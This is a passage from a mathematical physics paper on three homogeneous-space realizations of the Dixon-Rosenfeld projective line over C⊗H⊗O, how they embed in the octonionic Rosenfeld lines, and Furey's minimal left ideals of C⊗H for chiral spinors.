\(\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\). The Lie algebra \(\mathfrak{a}_{II}\) has real dimension \(21+3+64=88\). 3. Finally, in the case \(\mathbb{A}=\mathbb{C}\otimes\mathbb{O}\) and \(\mathbb{B}=\mathbb{H}\), Tits' construction yields to the real vector space where \(\left(\mathbb{C}\otimes\mathbb{O}\right)^{\prime}\otimes\mathfrak{J}_{2}^{ \prime}\left(\mathbb{H}\right)\) can be intended as the \(\left(\mathbf{7}+\mathbf{7}+\mathbf{1},\mathbf{5}\right)\) of \(\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\). The Lie algebra \(\mathfrak{a}_{3}\) has dimension \(14+10+75=99\). ### Three Dixon lines A Dixon-Rosenfeld line \(\mathbb{T}P^{1}\) can be realized as an homogeneous space of dimension \(\dim_{\mathbb{R}}\mathbb{T}P^{1}=\dim_{\mathbb{R}}\mathbb{T}=64\), whose Lie algebra \(\mathfrak{Lie}\left(\mathbb{T}P^{1}\right)\) relates to the isometry and isotropy Lie algebras as follows: \[\mathfrak{Lie}\left(\mathbb{T}P^{1}\right)\simeq\mathfrak{isom}\left( \mathbb{T}P^{1}\right)\ominus\mathfrak{isot}\left(\mathbb{T}P^{1}\right), \tag{28}\] and whose tangent space \(T\left(\mathbb{T}P^{1}\right)\) carries a \(\mathfrak{isot}\left(\mathbb{T}P^{1}\right)\)-covariant realization of \(\mathbb{T}\) itself. We will now discuss how, due to the three possible cases in Eq. (24), there exist three "homogeneous realizations" of the Dixon-Rosenfeld projective line \(\mathbb{T}P^{1}\), which will be distinguished by the subscript \(I\), \(II\) and \(III\), respectively. The first case is with isometry Lie algebra given by \[\mathfrak{a}_{I}=\mathfrak{isom}\left(\mathbb{T}P^{1}_{I}\right)=\mathfrak{su} _{2}\oplus\mathfrak{so}_{9}\oplus\left(\mathbf{7},\mathbf{9}\right). \tag{29}\] \begin{table} \begin{tabular}{|c|c|c|c|} \hline & \(\mathbb{T}P^{1}_{I}\) & \(\mathbb{T}P^{1}_{II}\) & \(\mathbb{T}P^{1}_{III}\) \\ \hline \hline isom & \(\mathfrak{su}_{2}\oplus\mathfrak{so}_{9}\oplus\left(\mathbf{7},\mathbf{9}\right)\) & \(\mathfrak{g}_{2}\oplus\mathfrak{so}_{2}\oplus\left(\mathbf{7},\mathbf{2}\cdot \mathbf{7}+\mathbf{1}\right)\) & \(\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus\left(\mathbf{7}+\mathbf{7}+ \mathbf{1},\mathbf{5}\right)\) \\ \hline isot & \(\mathfrak{su}_{2}\oplus\mathfrak{so}_{7}\oplus\left(\mathbf{7},\mathbf{1} \right)\oplus\left(\mathbf{1},\mathbf{7}\right)\) & \(\mathfrak{so}_{7}\oplus\mathfrak{su}_{2}\) & \(\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\oplus\left(\mathbf{2}\cdot\mathbf{7}+ \mathbf{1},\mathbf{1}\right)\oplus\left(\mathbf{1},\mathbf{3}\right)\) \\ \hline Real. \(\mathbb{T}\) & \(\left(\mathbf{7}+\mathbf{1},\mathbf{7}+\mathbf{1}\right)\) of \(\mathfrak{su}_{2}\oplus\mathfrak{g}_{2}\) & \(\left(\mathbf{7}+\mathbf{1},\mathbf{7}+\mathbf{1}\right)\) of \(\mathfrak{su}_{2}\oplus\mathfrak{so}_{2}\) & \(2\cdot\left(\mathbf{7}+\mathbf{1},\mathbf{3}+\mathbf{1}\right)\) of \(\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\) \\ \hline \end{tabular} \end{table} Table 3: Isometry algebra, isotropy algebra and covariant realization of \(\mathbb{T}\) itself in the three Dixon-Rosenfeld lines. By iterated branchings of \(\mathfrak{a}_{I}\), one obtains \[\mathfrak{su}_{2}\oplus\mathfrak{so}_{9}\oplus(\mathbf{7},\mathbf{9}) =\mathfrak{su}_{2}\oplus\mathfrak{so}_{8}\oplus(\mathbf{7}, \mathbf{8}_{v}+\mathbf{1})\oplus(\mathbf{1},\mathbf{8}_{v})\] \[=\mathfrak{su}_{2}\oplus\mathfrak{so}_{7}\oplus(\mathbf{7}, \mathbf{7}+\mathbf{1}+\mathbf{1})\oplus(\mathbf{1},2\cdot\mathbf{7}+\mathbf{1})\] \[=\mathfrak{su}_{2}\oplus\mathfrak{g}_{2}\oplus(\mathbf{7}, \mathbf{7}+\mathbf{1}+\mathbf{1})\oplus(\mathbf{1},3\cdot\mathbf{7}+\mathbf{1}) \tag{30}\] \[\simeq\mathfrak{iso}\left(\mathbb{T}P_{I}^{1}\right)\oplus T\left( \mathbb{T}P_{I}^{1}\right),\] where the covariant realization of \(\mathbb{T}\) is given by \[\mathbb{T}\mathbb{T}\mathbb{T}P_{I}^{1}\simeq\left(\mathbf{7}+\mathbf{1}, \mathbf{7}+\mathbf{1}\right)\text{ of }\mathfrak{su}_{2}\oplus\mathfrak{g}_{2}. \tag{31}\] We thus have that the isotropy Lie algebra is given by \[\mathfrak{iso}\left(\mathbb{T}P_{I}^{1}\right)\simeq\mathfrak{su} _{2}\oplus\mathfrak{g}_{2}\oplus(\mathbf{7},\mathbf{1})\oplus 2\cdot(\mathbf{1}, \mathbf{7}) \tag{32}\] \[=\mathfrak{su}_{2}\oplus\mathfrak{so}_{7}\oplus(\mathbf{7}, \mathbf{1})\oplus(\mathbf{1},\mathbf{7})\,,\] therefore yielding to the following characterization of the Dixon projective line \(\mathbb{T}P_{I}^{1}\) as a homogeneous space, i.e. \[\mathbb{T}P_{I}^{1}\simeq\frac{SU_{2}\times SO_{9}\ltimes(\mathbf{7},\mathbf{ 9})}{SU_{2}\times SO_{7}\ltimes((\mathbf{7},\mathbf{1})\times(\mathbf{1}, \mathbf{7}))}. \tag{33}\] As simple check on dimension, we indeed have that \(\dim_{\mathbb{R}}\mathbb{T}P_{I}^{1}=3+36+63-3-21-14=64\), which indeed is equal to \(\dim_{\mathbb{R}}\mathbb{T}\) as expected. The second case is slightly different since the Lie algebra \[\mathfrak{a}_{II}=\mathfrak{iso}\left(\mathbb{T}P_{II}^{1}\right)=\mathfrak{g} _{2}\oplus\mathfrak{su}_{2}\oplus(\mathbf{7},2\cdot\mathbf{7}+\mathbf{1}) \tag{34}\] does not contain \(\mathbb{T}\) and, therefore, it must necessarily be enhanced at least by the set \((\mathbf{1},\mathbf{7}+\mathbf{1})\) of coset generators such that \[\mathfrak{iso}\left(\mathbb{T}P_{II}^{1}\right)_{\text{enh.}} :=\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\oplus(\mathbf{7},2 \cdot\mathbf{7}+\mathbf{1})\oplus(\mathbf{1},\mathbf{7}+\mathbf{1}) \tag{35}\] \[\simeq\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\oplus(\mathbf{7}, \mathbf{1})\oplus\mathbb{T}=\mathfrak{so}_{7}\oplus\mathfrak{su}_{2}\oplus \mathbb{T}. \tag{36}\] Thus, from the (minimally) enhanced \(\mathfrak{iso}\left(\mathbb{T}P_{II}^{1}\right)_{\text{enh.}}\) one easily obtains \[\mathfrak{iso}\left(\mathbb{T}P_{II}^{1}\right)_{\text{enh.}}\simeq\mathfrak{iso }\left(\mathbb{T}P_{II}^{1}\right)\oplus T\left(\mathbb{T}P_{II}^{1}\right), \tag{37}\] yielding to the following isotropy Lie algebra \[\mathfrak{iso}\left(\mathbb{T}P_{II}^{1}\right)\simeq\mathfrak{g}_{2}\oplus \mathfrak{su}_{2}\oplus(\mathbf{7},\mathbf{1})=\mathfrak{so}_{7}\oplus \mathfrak{su}_{2}. \tag{38}\] We then have the following characterization of the Dixon projective line \(\mathbb{T}P_{II}^{1}\) as a homogeneous space given by \[\mathbb{T}P_{II}^{1}\simeq\frac{SO_{7}\times SU_{2}\ltimes(\mathbf{7}+ \mathbf{1},\mathbf{7}+\mathbf{1})}{SO_{7}\times SU_{2}}. \tag{39}\] As simple check on dimension, we indeed have that \(\dim_{\mathbb{R}}\mathbb{T}P_{II}^{1}=21+3+64-3-21=64\), which indeed is equal to \(\dim_{\mathbb{R}}\mathbb{T}\) as expected. Finally, as for the third case the isometry Lie algebra is given by \[\mathfrak{a}_{III}=\mathfrak{iso}\left(\mathbb{T}P_{III}^{1}\right)=\mathfrak{g} _{2}\oplus\mathfrak{so}_{5}\oplus(\mathbf{7}+\mathbf{7}+\mathbf{1},\mathbf{ 5})\,. \tag{40}\] By iterated branchings of \(\mathfrak{a}_{III}\), one obtains \[\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus(2\cdot\mathbf{7}+ \mathbf{1},\mathbf{5}) =\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\oplus\mathfrak{su}_{2} \oplus(\mathbf{1},\mathbf{2},\mathbf{2})\oplus(2\cdot\mathbf{7}+\mathbf{1}, \mathbf{2},\mathbf{2})\oplus(2\cdot\mathbf{7}+\mathbf{1},\mathbf{1},\mathbf{ 1})\] \[=\mathfrak{g}_{2}\oplus\mathfrak{su}_{2,d}\oplus 2\cdot(\mathbf{1}, \mathbf{3})\oplus(\mathbf{1},\mathbf{1})\oplus(2\cdot\mathbf{7}+\mathbf{1}, \mathbf{3})\oplus 2\cdot(2\cdot\mathbf{7}+\mathbf{1},\mathbf{1}) \tag{41}\] \[\simeq\mathfrak{iso}\left(\mathbb{T}P_{III}^{1}\right)\oplus T \left(\mathbb{T}P_{III}^{1}\right), \tag{42}\] thus yielding [82] an isotropy Lie algebra given by \[\mathfrak{iso}\left(\mathbb{T}P_{III}^{1}\right)\simeq\mathfrak{g}_{2}\oplus \mathfrak{su}_{2}\oplus(2\cdot\mathbf{7}+\mathbf{1},\mathbf{1})\oplus( \mathbf{1},\mathbf{3})\,, \tag{43}\] and therefore to the following characterization of the Dixon projective line \(\mathbb{T}P^{1}_{III}\) as a homogeneous space: \[\mathbb{T}P^{1}_{III}\simeq\frac{G_{2}\times SO_{5}\ltimes(2\cdot \boldsymbol{7}+\boldsymbol{1},\boldsymbol{5})}{G_{2}\times SU_{2}\ltimes((2 \cdot\boldsymbol{7}+\boldsymbol{1},\boldsymbol{1})\times(\boldsymbol{1}, \boldsymbol{3}))}, \tag{44}\] where, again the dimensional check gives us back \[\dim_{\mathbb{R}}\mathbb{T}P^{1}_{III}=14+10+75-14-3-18=64=\dim_{\mathbb{R}} \mathbb{T}. \tag{45}\] **Remark**. Since the covariant realization of \(\mathbb{T}\) in the first two cases is equal, it seems logical to investigate mutual relationship between Dixionian lines. We have a direct embedding of \(\mathbb{T}P^{1}_{II}\) in \(\mathbb{T}P^{1}_{I}\) since \[\mathfrak{isom}\left(\mathbb{T}P^{1}_{I}\right) \simeq\mathfrak{so}_{9}\oplus\mathfrak{su}_{2}\oplus(\boldsymbol{ 9},\boldsymbol{7})=\mathfrak{so}_{8}\oplus\mathfrak{su}_{2}\oplus( \boldsymbol{8}_{v}+\boldsymbol{1},\boldsymbol{7})\oplus(\boldsymbol{8}_{v}, \boldsymbol{1})\] \[=\mathfrak{so}_{7}\oplus\mathfrak{su}_{2}\oplus(\boldsymbol{7} +2\cdot\boldsymbol{1},\boldsymbol{7})\oplus(2\cdot\boldsymbol{7}+\boldsymbol {1},\boldsymbol{1})\] \[=\mathfrak{isom}\left(\mathbb{T}P^{1}_{II}\right)\oplus( \boldsymbol{7},\boldsymbol{1})\oplus(\boldsymbol{1},\boldsymbol{7})\,. \tag{46}\] On the other hand, from a comparison of the corresponding isometries, it is immediate to establish that are no possible embeddings between \(\mathbb{T}P^{1}_{III}\) and \(\mathbb{T}P^{1}_{I}\) or \(\mathbb{T}P^{1}_{II}\). ## III Relationship with octonionic Rosenfeld lines It is interesting to point out the relationship between the Dixon-Rosenfeld lines and the other octonionic Rosenfeld lines, whose definition can be found in from an historical point of view in [11, 12] and in a more rigorous definition in [10]. Let us just recall here the homogeneous space realization of Rosenfeld lines over \(\mathbb{A}\otimes\mathbb{O}\), with \(\mathbb{A}=\mathbb{R},\mathbb{C},\mathbb{H},\mathbb{O}\) (see [11, 12, 13] and [10], i.e. for the _octonionic projective line_\((\mathbb{R}\otimes\mathbb{O})\,P^{1}\), the _bioctonionic Rosenfeld line_\((\mathbb{C}\otimes\mathbb{O})\,P^{1}\), the _quateroctonionic Rosenfeld line_\((\mathbb{H}\otimes\mathbb{O})\,P^{1}\) and, finally, for the _octoocationic Rosenfeld line_\((\mathbb{O}\otimes\mathbb{O})\,P^{1}\): \[\left(\mathbb{R}\otimes\mathbb{O}\right)P^{1} =\frac{SO_{9}}{SO_{8}}\simeq S^{8},\] \[\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1} =\frac{SO_{10}\times U_{1}}{SO_{8}\times U_{1}\times U_{1}}\simeq \frac{SO_{10}}{SO_{8}\times U_{1}},\] \[\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1} =\frac{SO_{12}\times Sp_{2}}{SO_{8}\times SU_{2}\times Sp_{2}} \simeq\frac{SO_{12}}{SO_{8}\times SU_{2}\times SU_{2}},\] \[\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1} =\frac{SO_{16}}{SO_{8}\times SO_{8}},\] from which it consistently follows that \[T\left(\mathbb{O}P^{1}\right) \simeq \boldsymbol{8}_{v}\text{ of }\mathfrak{so}_{8} \tag{47}\] \[\simeq \boldsymbol{7}+\boldsymbol{1}\text{ of }\mathfrak{so}_{7}\] \[\simeq \boldsymbol{7}+\boldsymbol{1}\text{ of }\mathfrak{g}_{2},\] \[T\left(\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\right) \simeq \boldsymbol{8}_{v,+}\oplus\boldsymbol{8}_{v,-}\text{ of }\mathfrak{so}_{8}\oplus\mathfrak{u}_{1} \tag{48}\] \[\simeq 2\cdot\left(\boldsymbol{7}+\boldsymbol{1}\right)\text{ of } \mathfrak{so}_{7}\] \[\simeq 2\cdot\left(\boldsymbol{7}+\boldsymbol{1}\right)\text{ of } \mathfrak{g}_{2},\] \[T\left(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\right) \simeq \left(\boldsymbol{8}_{v},\boldsymbol{2},\boldsymbol{2}\right)\text{ of }\mathfrak{so}_{8}\oplus\mathfrak{su}_{2}\oplus\mathfrak{su}_{2} \tag{49}\] \[\simeq \left(\boldsymbol{8}_{v},\boldsymbol{3}+\boldsymbol{1}\right) \text{ of }\mathfrak{so}_{8}\oplus\mathfrak{su}_{2,d}\] \[\simeq \left(\boldsymbol{7}+\boldsymbol{1},\boldsymbol{3}+\boldsymbol{1 }\right)\text{ of }\mathfrak{g}_{2}\oplus\mathfrak{su}_{2},\] \[T\left(\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\right) \simeq \left(\boldsymbol{8}_{v},\boldsymbol{8}_{v}\right)\text{ of }\mathfrak{so}_{8}\oplus\mathfrak{so}_{8} \tag{50}\] \[\simeq \left(\boldsymbol{7}+\boldsymbol{1},\boldsymbol{7}+\boldsymbol{1 }\right)\text{ of }\mathfrak{so}_{7}\oplus\mathfrak{so}_{7}\] \[\simeq \left(\boldsymbol{7}+\boldsymbol{1},\boldsymbol{7}+\boldsymbol{1 }\right)\text{ of }\mathfrak{g}_{2}\oplus\mathfrak{g}_{2}.\] which illustrates how the tangent spaces of octonionic projective lines generally carry an enhancement of the symmetry with respect to the Lie algebra \(\mathfrak{der}\left(\mathbb{A}\otimes\mathbb{O}\right)\simeq\mathfrak{der}\left( \mathbb{A}\right)\oplus\mathfrak{g}_{2}\). Geometrically, the octonionic projective lines \(\left(\mathbb{A}\otimes\mathbb{O}\right)P^{1}\) can be regarded as \(\mathbb{A}\otimes\mathbb{O}\) together with a point at infinity, and thus as a \(8\mathrm{dim}_{\mathbb{R}}\mathbb{A}\)-sphere, namely as a maximal totally geodesic sphere in the corresponding octonionic Rosenfeld projective plane \(\left(\mathbb{A}\otimes\mathbb{O}\right)P^{2}\)[11]. In the case \(\mathbb{A}=\mathbb{R}\), such a "spherical characterization" of octonionic projective lines is well known, whereas for the other cases (the "genuinely Rosenfeld" ones) it is less trivial (see e.g. [24]). We can now study the relations among the Dixon-Rosenfeld lines discussed above and the octonionic Rosenfeld lines. Since \[\mathsf{isom}\left(\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{16}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{9} \oplus\left(\mathbf{7},\mathbf{9}\right)\] \[=\mathfrak{g}_{2}\oplus\mathfrak{so}_{9}\oplus\left(\mathbf{7}, \mathbf{9}\right)\oplus\left(\mathbf{7},\mathbf{1}\right)\] \[=\mathfrak{su}_{2}\oplus\mathfrak{so}_{9}\oplus\left(\mathbf{7},\mathbf{9}\right)\oplus\left(\mathbf{7},\mathbf{1}\right)\oplus\left( \mathbf{11},\mathbf{1}\right)\] \[\simeq\mathsf{isom}\left(\mathbb{T}P^{1}_{I}\right)\oplus\left( \mathbf{7},\mathbf{1}\right)\oplus\left(\mathbf{11},\mathbf{1}\right), \tag{51}\] we then have that the first Dixon-Rosenfeld line \(\mathbb{T}P^{1}_{I}\) it is properly embedded in the octooctonionic plane \(\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\). On the other hand, since \[\mathsf{isom}\left(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{12}=\mathfrak{su}_{2}\oplus\mathfrak{so}_{9} \oplus\left(\mathbf{3},\mathbf{9}\right), \tag{52}\] \[\mathsf{isom}\left(\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{10}=\mathfrak{so}_{9}\oplus\mathbf{9},\] (53) \[\mathsf{isom}\left(\left(\mathbb{R}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{9}=\mathfrak{so}_{9}, \tag{54}\] it is clear that no embedding is possible between the first Dixon-Rosenfeld line \(\mathbb{T}P^{1}_{I}\) and the quateroctonionic plane \(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\), while it hold the proper chain of inclusions \[\mathbb{O}P^{1}\subset\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\subset \mathbb{T}P^{1}_{I}\subset\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}. \tag{55}\] Developing the same line of thought for the second Dixon-Rosenfeld line \(\mathbb{T}P^{1}_{II}\) yields to \[\mathsf{isom}\left(\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{16}=\mathfrak{so}_{9}\oplus\mathfrak{so}_{7} \oplus\left(\mathbf{9},\mathbf{7}\right)\] \[=\mathfrak{so}_{9}\oplus\mathfrak{so}_{7}\oplus\left(\mathbf{8}_ {v}+\mathbf{1},\mathbf{7}\right)\oplus\left(\mathbf{8}_{v},\mathbf{1}\right)\] \[=\mathfrak{so}_{7}\oplus\mathfrak{so}_{7}\oplus\left(\mathbf{7} {+}2\cdot\mathbf{1},\mathbf{7}\right)\oplus\left(2\cdot\mathbf{7}+\mathbf{1 },\mathbf{1}\right)\] \[=\mathfrak{so}_{7}\oplus\mathfrak{so}_{2}\oplus\left(\mathbf{7} {+}3\cdot\mathbf{1},\mathbf{7}\right)\oplus\left(2\cdot\mathbf{7}+\mathbf{1 },\mathbf{1}\right)\oplus\left(\mathbf{1},\mathbf{11}\right)\] \[\simeq\mathsf{isom}\left(\mathbb{T}P^{1}_{II}\right)\oplus 2\cdot\left( \mathbf{1},\mathbf{7}\right)\oplus\left(\mathbf{7},\mathbf{1}\right)\oplus \left(\mathbf{1},\mathbf{11}\right), \tag{56}\] which means that is possible an embedding of \(\mathbb{T}P^{1}_{II}\subset\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\). On the other hand, since \[\mathsf{isom}\left(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{12}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{5} \oplus\left(\mathbf{7},\mathbf{5}\right)\] \[=\left\{\begin{array}{l}\mathfrak{so}_{7}\oplus\mathfrak{su}_{2} \oplus\left(\mathbf{7},\mathbf{5}\right)\oplus\left(\mathbf{1},\mathbf{7} \right),\\ \text{or}\\ \mathfrak{so}_{7}\oplus\mathfrak{su}_{2}\oplus\mathfrak{su}_{2}\oplus(\mathbf{7 }+\mathbf{1},\mathbf{2},\mathbf{2})\oplus\left(\mathbf{7},\mathbf{1}, \mathbf{1}\right)\\ =\mathfrak{so}_{7}\oplus\mathfrak{su}_{2}\oplus(\mathbf{7}+\mathbf{1},\mathbf{ 3}+\mathbf{1})\oplus\left(\mathbf{7},\mathbf{1}\right),\end{array}\right. \tag{57}\] \[\mathsf{isom}\left(\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{10}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{3} \oplus\left(\mathbf{7},\mathbf{3}\right),\] (58) \[\mathsf{isom}\left(\left(\mathbb{R}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{9}=\mathfrak{so}_{7}\oplus\mathfrak{u}_{1} \oplus\mathbf{7}_{+}\oplus\mathbf{7}_{-}, \tag{59}\] no embedding is possible between between the second Dixon-Rosenfeld line \(\mathbb{T}P^{1}_{II}\) and the quateroctonionic plane \(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\) nor the bioctonionic plane \(\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\). Therefore we have the following chain of proper inclusions \[\mathbb{O}P^{1}\subset\mathbb{T}P^{1}_{II}\subset\left(\mathbb{O}\otimes \mathbb{O}\right)P^{1}. \tag{60}\] Finally, since the isometry algebra of the third Dixon-Rosenfeld line \(\mathbb{T}P^{1}_{II}\) is given by \[\mathsf{isom}\left(\mathbb{T}P^{1}_{III}\right) \simeq\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus\left(2\cdot \mathbf{7}+\mathbf{1},\mathbf{5}\right) \tag{61}\] \[=\mathfrak{g}_{2}\oplus\mathfrak{su}_{2}\oplus\mathfrak{su}_{2} \oplus\left(2\cdot\mathbf{7}{+}2\cdot\mathbf{1},\mathbf{2},\mathbf{2}\right) \oplus\left(2\cdot\mathbf{7}+\mathbf{1},\mathbf{1},\mathbf{1}\right)\] \[=\mathfrak{g}_{2}\oplus\mathfrak{su}_{2,d}\oplus\left(2\cdot \mathbf{7}{+}2\cdot\mathbf{1},\mathbf{3}+\mathbf{1}\right)\oplus\left(2\cdot \mathbf{7}+\mathbf{1},\mathbf{1}\right)\oplus\left(\mathbf{1},\mathbf{3} \right), \tag{62}\] while the isometry Lie algebra of the octoctonionic plane is \[\mathfrak{isom}\left(\left(\mathbb{O}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{16}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{9} \oplus(\mathbf{7},\mathbf{9})\] \[=\mathfrak{so}_{7}\oplus\mathfrak{so}_{5}\oplus\mathfrak{su}_{2} \oplus\mathfrak{su}_{2}\oplus(\mathbf{1},\mathbf{5},\mathbf{2},\mathbf{2}) \oplus(\mathbf{7},\mathbf{5},\mathbf{1},\mathbf{1})\oplus(\mathbf{7},\mathbf{1 },\mathbf{2},\mathbf{2})\] \[=\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus\mathfrak{su}_{2} \oplus\mathfrak{su}_{2}\oplus(\mathbf{1},\mathbf{5},\mathbf{2},\mathbf{2}) \oplus(\mathbf{7},\mathbf{5},\mathbf{1},\mathbf{1})\oplus(\mathbf{7},\mathbf{1 },\mathbf{2},\mathbf{2})\oplus(\mathbf{7},\mathbf{1},\mathbf{1},\mathbf{1})\] \[=\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus 6\cdot(\mathbf{1}, \mathbf{1})\oplus 4\cdot(\mathbf{1},\mathbf{5})\oplus(\mathbf{7},\mathbf{5}) \oplus 5\cdot(\mathbf{7},\mathbf{1})\,, \tag{63}\] we then have that no embedding is possible between \(\mathbb{T}P^{1}_{III}\) and \((\mathbb{O}\otimes\mathbb{O})\,P^{1}\). On the other hand, since \[\mathfrak{isom}\left(\left(\mathbb{H}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{12}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{5} \oplus(\mathbf{7},\mathbf{5})=\mathfrak{g}_{2}\oplus\mathfrak{so}_{5}\oplus( \mathbf{7},\mathbf{5})\oplus(\mathbf{7},\mathbf{1})\,, \tag{64}\] \[\mathfrak{isom}\left(\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{10}=\mathfrak{so}_{7}\oplus\mathfrak{so}_{3} \oplus(\mathbf{7},\mathbf{3})=\mathfrak{g}_{2}\oplus\mathfrak{so}_{3}\oplus( \mathbf{7},\mathbf{3})\oplus(\mathbf{7},\mathbf{1})\,,\] (65) \[\mathfrak{isom}\left(\left(\mathbb{R}\otimes\mathbb{O}\right)P^{1}\right) \simeq\mathfrak{so}_{9}=\mathfrak{so}_{7}\oplus\mathfrak{u}_{1}\oplus \mathbf{7}_{+}\oplus\mathbf{7}_{-}=\mathfrak{g}_{2}\oplus\mathfrak{u}_{1} \oplus\mathbf{7}_{+}\oplus\mathbf{7}_{-}\oplus\mathbf{7}_{0}, \tag{66}\] the only chain of proper inclusion is given by \[\mathbb{O}P^{1}\subset\left(\mathbb{C}\otimes\mathbb{O}\right)P^{1}\subset \mathbb{T}P^{1}_{III}. \tag{67}\] IV Projective lines over \(\mathbb{C}\otimes\mathbb{H}\) via \(\mathbb{C}\otimes J_{2}(\mathbb{H})\) ### Generalized minimal left ideals of \(\mathbb{C}\otimes\mathbb{H}\) In pursuing the Standard Model physics of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\), Furey started by considering generalized minimal left ideals of \(\mathbb{C}\otimes\mathbb{H}\) and demonstrated how scalar, chiral spinors, vector, and 2-form representations of the Lorentz spacetime group may be identified [15]. Given some algebra \(\mathfrak{g}\), a (generalized) minimal ideal \(\mathfrak{i}\subset\mathfrak{g}\) is a subalgebra where \(m(a,v)\in\mathfrak{i}\) for all \(a\in\mathfrak{g}\) and \(v\in\mathfrak{i}\) with \(m\) as a (generalized) multiplication. The generalized minimal left ideal that Furey considered for spinors from \(\mathfrak{g}=\mathbb{C}\otimes\mathbb{H}\) is \[m_{1}(a,v)=v^{\prime}=avP+a^{*}vP^{*} \tag{68}\] where \(P=(1+Ik)/2\) such that \(P^{*}=(1-Ik)/2\) are projectors satisfying \(P^{2}=P,P^{*2}=P^{*}\), and \(PP^{*}=P^{*}P=0\). The 4-vectors (1-forms) were found as generalized minimal ideals via the the following generalized multiplication, \[m_{2}(a,v)=v^{\prime}=ava^{\dagger}, \tag{69}\] where \(a^{\dagger}=\hat{a}^{*}\) is used just for this subsection when \(a\in\mathbb{C}\otimes\mathbb{H}\), with \(\hat{}\) and \({}^{*}\) denoting the quaternionic and complex conjugate, respectively. The symbol \(\dagger\) is used throughout as a Hermitian conjugate of the algebra, but the explicit mathematical operation will differ depending on the algebra under consideration. The scalars and field strength (2-forms) were found as generalized minimal ideals via the generalized multiplcation below, \[m_{3}(a,v)=v^{\prime}=av\hat{a}. \tag{70}\] Focusing on the spinors, a Dirac spinor \(\psi_{D}\) as an element of \(\mathbb{C}\otimes\mathbb{H}\) is decomposed into left- and right-chiral (Weyl) spinors \(\psi_{L}\) and \(\psi_{R}\) as minimal left ideals with respect to Eq. (68), \[\psi_{L}=v_{1}=\left(c_{1}+c_{3}j\right)P=\frac{1}{2}\left(\left(c_{1,1}+c_{1,2 }I\right)-\left(c_{3,2}-c_{3,1}I\right)i+\left(c_{3,1}+c_{3,2}I\right)j-\left(c _{1,2}-c_{1,1}I\right)k\right),\] \[\psi_{R}=v_{2}=\left(c_{2}-c_{4}j\right)P^{*}=\frac{1}{2}\left(\left(c_{2,1}+c_{ 2,2}I\right)-\left(c_{4,2}-c_{4,1}I\right)i-\left(c_{4,1}+c_{4,2}I\right)j+ \left(c_{2,2}-c_{2,1}I\right)k\right), \tag{71}\] where \(c_{i}\) for \(i=1,\ldots 4\) are complex coefficients \(c_{i}=c_{i,1}+c_{i,2}I\). Since \(\mathbb{C}\otimes\mathbb{H}\) is associative, it is straightforward to verify that \(\psi_{L}P=\psi_{L},\psi_{R}P^{*}=\psi_{R}\), and \(\psi_{L}P^{*}=\psi_{R}P=0\). Additionally, the Lorentz transformations can be found as the exponentiation of linear combinations of vectors and bivectors of \(Cl(3)\). The basis of minimal ideals is less clear with \(\mathbb{C}\otimes\mathbb{H}\) and improved with reference to another basis spanned by \(\{P,P^{*},jP,jP^{*},IP,IP^{*},IJP,IjP^{*}\}\). To provide a dictionary of various representations used by Furey for the spinor minimal ideal bases [15, 16, 17], consider \[P =[\uparrow L]=|\uparrow\rangle\langle\uparrow|=\epsilon_{\uparrow \uparrow}=\frac{1+Ik}{2},\] \[P^{*} =[\downarrow R]=|\downarrow\rangle\langle\downarrow|=\epsilon_{ \downarrow\downarrow}=\frac{1-Ik}{2},\] \[jP =[\downarrow L]=|\downarrow\rangle\langle\uparrow|=\epsilon_{ \downarrow\uparrow}=\frac{j+Ii}{2}=\alpha, \tag{72}\] \[jP^{*} =-jP^{*} =[\uparrow R]=|\uparrow\rangle\langle\downarrow|=\epsilon_{ \uparrow\downarrow}=\frac{-j+Ii}{2}=\alpha^{\dagger}.\] We found it convenient to confirm that \(\psi_{L}\) and \(\psi_{R}\) are minimal left ideals in Mathematica when converting to the basis above (along with the four elements multiplied by \(I\) ). The following anti-commutation relations can be found, \[\begin{split}\left\{\alpha,\alpha^{\dagger}\right\}& =1,\\ \left\{\alpha,\alpha\right\}&=0,\\ 